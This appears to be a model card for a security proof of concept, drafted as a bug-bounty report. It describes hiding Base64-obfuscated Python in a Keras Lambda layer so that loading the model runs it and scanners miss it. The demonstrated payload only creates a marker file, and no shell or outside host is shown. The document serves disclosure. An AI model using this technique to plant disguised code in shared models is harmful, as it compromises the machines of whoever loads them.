Security Research PoC: TensorFlow SavedModel RCE
โ ๏ธ WARNING: This model is a Proof-of-Concept (PoC) for security research purposes only. DO NOT USE IN PRODUCTION.
Description
This repository contains a TensorFlow SavedModel that demonstrates an Arbitrary Code Execution (ACE) vulnerability via Keras Lambda layers. It is intended for submission to the Huntr/Protect AI bug bounty program.
Vulnerability Details
The model utilizes a Keras Lambda layer to embed arbitrary Python bytecode. To demonstrate a bypass of static analysis tools (like ModelScan), the payload has been obfuscated using Base64 encoding.
- Payload: Creates a file at
/tmp/stealth_pwned.txt. - Trigger: Loading the model via
tf.keras.models.load_model.
How to Reproduce (For Triagers)
- Install TensorFlow:
pip install tensorflow==2.15.0 import tensorflow as tf import os
Load the model (simulating a victim loading an untrusted model)
safe_mode=False is required for Lambda deserialization
print("[*] Loading model...") model = tf.keras.models.load_model(".", safe_mode=False)
Check for code execution
if os.path.exists("/tmp/stealth_pwned.txt"): print("[!!!] SUCCESS: Arbitrary code executed. /tmp/stealth_pwned.txt created.") else: print("[?] FAILED: Payload did not execute.")
2. For the Huntr Submission Form
Copy and paste this into the "Description" or "Vulnerability Details" box on Huntr.
Title: Arbitrary Code Execution via Obfuscated Keras Lambda Layer (Bypasses Static Analysis)
Description:
I have identified a vulnerability in the TensorFlow SavedModel format where an attacker can embed malicious Python bytecode using a Keras Lambda layer. When a victim loads this model using tf.keras.models.load_model, the code executes immediately.
Vulnerability Details:
The saved_model.pb format, when generated by Keras, allows for the serialization of arbitrary Python functions within Lambda layers. While modelscan and other tools flag the presence of Lambda layers as a "Medium" severity, they often fail to inspect the actual bytecode or serialized content effectively.
I have demonstrated that an attacker can obfuscate the payload (using Base64 encoding) to hide malicious intent (e.g., os.system calls) from static analysis tools. This allows a malicious model to appear as a benign model with a custom math operation while actually executing a reverse shell or dropping malware.
Proof of Concept (PoC):
- Repository: [PASTE YOUR HUGGING FACE URL HERE]
- Payload: The model executes a hidden payload that runs
touch /tmp/stealth_pwned.txt. - Obfuscation: The payload is encoded in Base64 to evade keyword detection scanners.
Steps to Reproduce:
- Download the model files from the linked repository.
- Install TensorFlow:
pip install tensorflow==2.15.0. - Run the following Python script:
import tensorflow as tf import os # Load the downloaded model folder model = tf.keras.models.load_model("path_to_model_folder", safe_mode=False) if os.path.exists("/tmp/stealth_pwned.txt"): print("VULNERABILITY CONFIRMED: Code executed!")
Impact: Arbitrary Code Execution (ACE) on the machine of any user who loads the model. This can lead to full system compromise, data exfiltration, or lateral movement within an organization's AI pipeline.